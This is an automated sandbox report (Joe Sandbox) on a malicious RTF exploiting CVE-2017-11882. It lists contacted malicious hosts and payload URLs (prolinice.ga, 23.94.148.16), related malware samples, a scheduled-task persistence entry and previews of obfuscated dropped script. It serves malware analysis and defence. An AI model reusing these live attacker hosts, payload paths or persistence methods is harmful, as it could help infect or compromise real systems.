            http://prolinice.ga/explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmptrue
            • 16%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://wehtwifahcxeheu.com/explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/Licensepowershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://contoso.com/Iconpowershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drfalse
            • URL Reputation: safe
            		unknown
            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchexplorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drfalse
            • URL Reputation: safe
            		unknown
            http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFjEQNEDT32.EXE, 00000001.00000002.348951439.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.com/favicon.icoE2E3.tmp.19.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://ac.ecosia.org/autocomplete?q=explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drfalse
            • URL Reputation: safe
            		unknown
            http://java.sun.comexplorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://crl.pkioverheid.nl/DomOvLatestCRL.crl0powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://contoso.com/powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://23.94.148.16powershell.exe, 00000007.00000002.363808831.0000000002749000.00000004.00000800.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.piriform.com/ccleanerexplorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://go.microsoft.cpowershell.exe, 00000007.00000002.363633576.00000000005BA000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.autoitscript.com/autoit3explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://support.mozilla.orgexplorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://prolinice.ga/index.phpMozilla/5.0explorer.exe, 00000013.00000002.432154791.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.419574794.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.421675719.0000000000404000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.628871617.0000000000744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.628530287.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.628826534.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.628600513.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.628599452.0000000000444000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.628577670.00000000003DE000.00000004.00000020.00020000.00000000.sdmptrue
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.entrust.net0Dpowershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.368085766.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.363808831.00000000024F1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://secure.comodo.com/CPS0powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://wehtwifahcxeheu.com/application/x-www-form-urlencodedMozilla/5.0explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drfalse
            • URL Reputation: safe
            		unknown
            https://ia803104.us.archive.org/27/items/vbs_20240LRpowershell.exe, 00000005.00000002.368085766.0000000002B22000.00000004.00000800.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://crl.entrust.net/2048ca.crl0powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown

            World Map of Contacted IPs

            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs

            Public IPs

            IPDomainCountryFlagASNASN NameMalicious
            207.241.232.154
            		ia803104.us.archive.orgUnited States
            		7941INTERNET-ARCHIVEUStrue
            23.94.148.16
            		unknownUnited States
            		36352AS-COLOCROSSINGUStrue
            185.251.91.119
            		prolinice.gaRussian Federation
            		35278SPRINTHOSTRUtrue

            General Information

            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1502248
            Start date and time:2024-08-31 19:24:12 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 7m 38s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of analysed new started processes analysed:28
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:1
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf
            Detection:MAL
            Classification:mal100.bank.troj.spyw.expl.evad.winRTF@36/20@10/3
            EGA Information:
            • Successful, ratio: 80%
            HCA Information:
            • Successful, ratio: 98%
            • Number of executed functions: 135
            • Number of non-executed functions: 95
            Cookbook Comments:
            • Found application associated with file extension: .rtf
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Active ActiveX Object
            • Scroll down
            • Close Viewer

            Warnings

            • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
            • Execution Graph export aborted for target EQNEDT32.EXE, PID 3312 because there are no executed function
            • Execution Graph export aborted for target gwseuha, PID 4020 because it is empty
            • Execution Graph export aborted for target powershell.exe, PID 3516 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

            Simulations

            Behavior and APIs

            TimeTypeDescription
            10:25:31Task SchedulerRun new task: Firefox Default Browser Agent E7F8FCB5C6098564 path: C:\Users\user\AppData\Roaming\gwseuha
            13:24:58API Interceptor287x Sleep call for process: EQNEDT32.EXE modified
            13:25:01API Interceptor77x Sleep call for process: powershell.exe modified
            13:25:01API Interceptor7x Sleep call for process: wscript.exe modified
            13:25:21API Interceptor119006x Sleep call for process: explorer.exe modified
            13:25:32API Interceptor5x Sleep call for process: gwseuha modified
            13:25:32API Interceptor208x Sleep call for process: taskeng.exe modified

            Joe Sandbox View / Context

            IPs

            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            207.241.232.154SecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtfGet hashmaliciousRemcosBrowse
              Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                  40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                    inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                      RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                        RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                          SI_56127.vbsGet hashmaliciousRemcosBrowse
                            CAN_POST2617276.vbsGet hashmaliciousRemcosBrowse
                              CAN_POST7865678.vbsGet hashmaliciousAsyncRATBrowse
                                23.94.148.1640830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 23.94.148.16/90/WEFV.txt
                                185.251.91.11940830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • prolinice.ga/index.php

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                prolinice.ga40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 185.251.91.119
                                #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 77.232.129.190
                                171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818fe52443.dat-decoded.exeGet hashmaliciousSmokeLoaderBrowse
                                • 77.232.129.190
                                #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 77.232.129.190
                                ia803104.us.archive.orgSecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtfGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 207.241.232.154
                                inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 207.241.232.154
                                RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                SI_56127.vbsGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                CAN_POST2617276.vbsGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                CAN_POST7865678.vbsGet hashmaliciousAsyncRATBrowse
                                • 207.241.232.154

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                SPRINTHOSTRU40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 185.251.91.119
                                2ZJuaB7CQ4.exeGet hashmaliciousDCRatBrowse
                                • 141.8.194.149
                                5P9EdUgv5r.exeGet hashmaliciousDCRatBrowse
                                • 141.8.194.149
                                06wRHV3NYY.exeGet hashmaliciousDCRatBrowse
                                • 141.8.192.103
                                bfderfg.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                • 141.8.197.42
                                YMtjYvZX2i.exeGet hashmaliciousDCRatBrowse
                                • 141.8.197.42
                                p7oBHwDt23.exeGet hashmaliciousDCRatBrowse
                                • 141.8.197.42
                                pxkGBmsm1Y.exeGet hashmaliciousDCRatBrowse
                                • 141.8.193.236
                                N7lmWFMEgx.exeGet hashmaliciousDCRatBrowse
                                • 141.8.192.126
                                X1BQ0d74HR.exeGet hashmaliciousDCRatBrowse
                                • 141.8.197.42
                                INTERNET-ARCHIVEUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtfGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 207.241.232.154
                                INQUIRY#46789_MAT24_NEW_PROJECT_SAMPLE.jsGet hashmaliciousAgentTeslaBrowse
                                • 207.241.227.86
                                inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 207.241.232.154
                                Pedido9456_muestras_material_JC_INDUSTRIAL_DE_MEXICO SA de CV.jsGet hashmaliciousAgentTeslaBrowse
                                • 207.241.227.86
                                RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                SI_56127.vbsGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                AS-COLOCROSSINGUSSecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtfGet hashmaliciousRemcosBrowse
                                • 192.3.243.166
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 192.3.243.166
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 192.3.243.166
                                40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 23.94.148.16
                                rAwGQLtWJr.exeGet hashmaliciousRemcosBrowse
                                • 23.95.60.82
                                inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 107.175.229.146
                                SALKI098765R400.exeGet hashmaliciousRemcosBrowse
                                • 192.210.150.26
                                RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 198.46.178.181
                                RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                • 192.3.140.102
                                RFQ_0020829024SEPT.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 198.46.178.181

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                05af1f5ca1b87cc9cc9b25185115607dSecuriteInfo.com.Exploit.CVE-2017-11882.123.12262.2326.rtfGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                Order enquiry.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                • 207.241.232.154
                                inv-lista de embalaje de env#U00edo 08-29.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                • 207.241.232.154
                                RFQ_0030829024SEPT.xla.xlsxGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                RFQ -PO-SMT290824.xlsGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                RFQ_0020829024SEPT.xla.xlsxGet hashmaliciousUnknownBrowse
                                • 207.241.232.154
                                Sepco RFQ.xlsGet hashmaliciousRemcosBrowse
                                • 207.241.232.154
                                SecuriteInfo.com.Exploit.CVE-2017-11882.123.9070.28632.rtfGet hashmaliciousRemcosBrowse
                                • 207.241.232.154

                                Dropped Files

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                C:\Users\user\AppData\Roaming\gwseuha40830001.xlsGet hashmaliciousSmokeLoaderBrowse
                                  capcut Setup-x64.msiGet hashmaliciousRedLineBrowse
                                    7YZlAbfKMg.rtfGet hashmaliciousAgentTeslaBrowse
                                      Product Inquiry466789.xlsGet hashmaliciousAgentTeslaBrowse
                                        A24-00342B139336 #TW_Inquiry.xlsGet hashmaliciousSmokeLoaderBrowse
                                          LgTFM1JlJu.rtfGet hashmaliciousAgentTeslaBrowse
                                            #20240627_Edlen_B.xlsGet hashmaliciousSmokeLoaderBrowse
                                              #20240627_Edlen_A.xlsGet hashmaliciousSmokeLoaderBrowse
                                                Requirements.xla.xlsxGet hashmaliciousAveMaria, UACMeBrowse
                                                  vns.exeGet hashmaliciousAsyncRAT, VenomRATBrowse

                                                    Created / dropped Files

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):4760
                                                    Entropy (8bit):4.834060479684549
                                                    Encrypted:false
                                                    SSDEEP:96:RCJ2Woe5u2k6Lm5emmXIGxgyg12jDs+un/iQLEYFjDaeWJ6KGcmXSFRLcU6/KD:cxoe5uVsm5emdOgkjDt4iWN3yBGHydcY
                                                    MD5:838C1F472806CF4BA2A9EC49C27C2847
                                                    SHA1:D1C63579585C4740956B099697C74AD3E7C89751
                                                    SHA-256:40A844E6AF823D9E71A35DFEE1FF7383D8A682E9981FB70440CA47AA1F6F1FF3
                                                    SHA-512:E784B61696AB19C5A178204A11E4012A9A29D58B3D3BF1D5648021693883FFF343C87777E7A2ADC81B833148B90B88E60948B370D2BB99DEC70C097B5C91B145
                                                    Malicious:false
                                                    Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                    Download File
                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):64
                                                    Entropy (8bit):0.34726597513537405
                                                    Encrypted:false
                                                    SSDEEP:3:Nlll:Nll
                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                    Malicious:false
                                                    Preview:@...e...........................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\verynicebuttersmoothcakeicream[1].tiff

                                                    Download File
                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):183084
                                                    Entropy (8bit):3.886576284833851
                                                    Encrypted:false
                                                    SSDEEP:3072:bYFoL2rQi6toiBDgt5p0Gwo9QjS7/DVRq9f1y9uuYaROM5e:0uqrh6BGqykae
                                                    MD5:5AC26F4D93962796DB9CD2E19B32B200
                                                    SHA1:9856C349AD2B408CDD23AA63A620F22FBDA87FA3
                                                    SHA-256:E3E7A3D0BA55B8DBBE3633B1DAD0A3BBF4EADA72DD8DF3F7B1BC76A692862F23
                                                    SHA-512:4C806A0A8FBA3FA9B24A0631D5A3E12F87E21AB3E45F44ECA8DE8C756F436B56E14D383A8B871BD5B5781624AC10E55F2FAD92DE02FA98E6FA53F57D6864B00A
                                                    Malicious:false
                                                    Preview:......a.O.L.h.K.f.L.q.J.U. .=. .".Z.n.f.L.W.m.C.c.G.n.".....U.z.p.u.L.N.N.f.K.k. .=. .".O.e.h.A.Q.W.U.x.L.L.".....L.c.g.O.G.K.m.K.c.L. .=. .".H.b.L.k.L.t.L.W.c.Q.".....v.c.U.s.f.l.Z.R.l.C. .=. .".m.L.u.b.S.T.k.K.W.h.".....k.O.G.G.J.A.l.U.e.f. .=. .".Z.R.f.K.z.W.L.Z.J.b.".....U.z.G.O.h.b.i.W.W.U. .=. .".Z.h.i.K.J.L.G.c.x.L.".....R.N.W.W.P.c.W.L.p.k. .=. .".i.n.L.c.R.a.L.O.R.T.".........L.J.R.H.p.W.O.L.i.A. .=. .".H.A.N.i.C.K.K.a.o.W.".....L.l.i.x.u.b.W.i.P.a. .=. .".e.C.P.x.b.Z.k.A.Q.c.".....c.a.W.i.l.m.i.U.Z.o. .=. .".P.O.b.f.c.P.W.t.m.W.".....p.b.n.Q.m.p.o.i.K.u. .=. .".Q.k.Z.A.v.l.I.x.c.J.".....P.q.i.G.N.O.k.W.u.S. .=. .".u.N.U.K.c.i.G.p.d.h.".....U.g.n.I.L.e.z.U.i.t. .=. .".I.W.G.c.L.u.h.W.H.k.".....o.a.k.C.e.o.A.L.z.i. .=. .".P.W.Z.Z.K.m.A.O.l.f.".....C.N.i.P.K.n.o.h.s.e. .=. .".N.G.U.q.L.d.i.z.G.W.".....P.c.K.P.T.W.k.e.Q.L. .=. .".s.h.N.H.b.z.k.W.T.W.".....L.N.G.L.t.A.H.i.d.G. .=. .".k.h.U.h.J.A.i.Z.P.W.".........P.c.Z.W.h.a.U.a.Q.s. .=. .".c.c.v.G.G.k.H.G.T.f.".....z.z.k.P.x.L.K.

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{F9766609-433D-40CB-BCBF-A25F8E3EF4C7}.tmp

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):16384
                                                    Entropy (8bit):0.0
                                                    Encrypted:false
                                                    SSDEEP:3::
                                                    MD5:CE338FE6899778AACFC28414F2D9498B
                                                    SHA1:897256B6709E1A4DA9DABA92B6BDE39CCFCCD8C1
                                                    SHA-256:4FE7B59AF6DE3B665B67788CC2F99892AB827EFAE3A467342B3BB4E3BC8E5BFE
                                                    SHA-512:6EB7F16CF7AFCABE9BDEA88BDAB0469A7937EB715ADA9DFD8F428D9D38D86133945F5F2F2688DDD96062223A39B5D47F07AFC3C48D9DB1D5EE3F41C8D274DCCF
                                                    Malicious:false
                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8B48071C-36AA-4577-B156-9C097946CDF9}.tmp

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):11264
                                                    Entropy (8bit):3.5492038516464706
                                                    Encrypted:false
                                                    SSDEEP:192:W0hkLlVEaY2KaQP1fQERQprctBmUgXBRJZA/D2MuwsL0nxjywfUemlEDolBMBIQB:/kZylraQP1oIQprctBmRBPe97xjywfOS
                                                    MD5:3764E4CA96AE27DAB8B915F3221C6858
                                                    SHA1:739A5F9B07458720C95473CC5E67F7842DCDBF93
                                                    SHA-256:82872288B166F2CE648028B559530201692E024EDAA1C40BD696364691DE86E3
                                                    SHA-512:3886E03C7B29ECAA928763CA4311F84B1C483875F608E75DB0992AD9489242AECD203A09FA8DCA3F2C970D067D5DCC9726917A3A93DC1D22A7948B00B3C69D6C
                                                    Malicious:false
                                                    Preview:..............8.5.5.4.8.5.2.%.;.*.6.,.[.<.?.|.*.;.@.9.?.(.?.(.8.0.?...!.$.'.@...@.|.*.?.?.=.~.-.1.?.3.3.7.1.*.7.!.<._...4.#.-.,.9.(.?...).....~._.#.#.;.3.?.+...7.,.(.~.+.<.<.?.).).!.)...1.>.#._._.5.....<.:...9.'.^.~.2.=.0.5.8.%.].:.@.4.|.+.3.1.)...^.;.?.?...8.%.=.=.9.[.+._.8.*.1.$.^.%.-.%.7.].@.?.-.*.*.5.;.+.&.(.$.~.?.=.%.,.<.5.7.9.;.?.`.].@.1.3.>.3.;.(.6.:.$.1.).`.2.*.?.6.@.|.<.!.[.9.7.2.+.!.:.1.`.?.2.<.+.4./.~.4.;.4...(...9.&.>.^.].&.?.5.2.0.^.?./.(.4...`...%...'.%.;.3...?.0.<.6.@.^.5.>.%.5.|.;.,...8.?.*.5.2.*.&.>.$.?._.8.$..._.1.>.,.^.|.).)...6.`.<.~.?.@.'.>.?.%.~.?.?.>.8.<.?.2.4.3.>.9.-.|.`...?.$.*.9.6.6.^.'.3.+.;.-.'.5.*...+.=.+.<...4.&.8.0.8.?.7.:.|.1...0...9.1.!.6.2.^.8.*.2.[.].?.<.#.:...&.:.2...>.%.%.5.-.8.?.?.%.!.%.5...).+.?.3.(.9.?...5.[.~.2.'.`.?.].8.8.?.>.?.&.8.+.[.2.'.*.|.?.4.^./.>.?.=.>.3.[.&.%.!.|._.../.9.[.;.'...#.?.|.`.+.?.@.%.6.0.6.=.#.).4.^.?./.`.~.9.~.,.#.1.@.=.$.$.<.&.?...@...$.?.5.%.'.1.*.[.7.,.4.7.2.?.2.!.9...+.^.@.0.!.?.,.>.7.3.2.4.+.<.^.3.$...$.^.8.9.%...,.?.#.

                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{FBE20470-930D-4657-894E-45CE94F633FB}.tmp

                                                    Download File
                                                    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):1024
                                                    Entropy (8bit):0.05390218305374581
                                                    Encrypted:false
                                                    SSDEEP:3:ol3lYdn:4Wn
                                                    MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
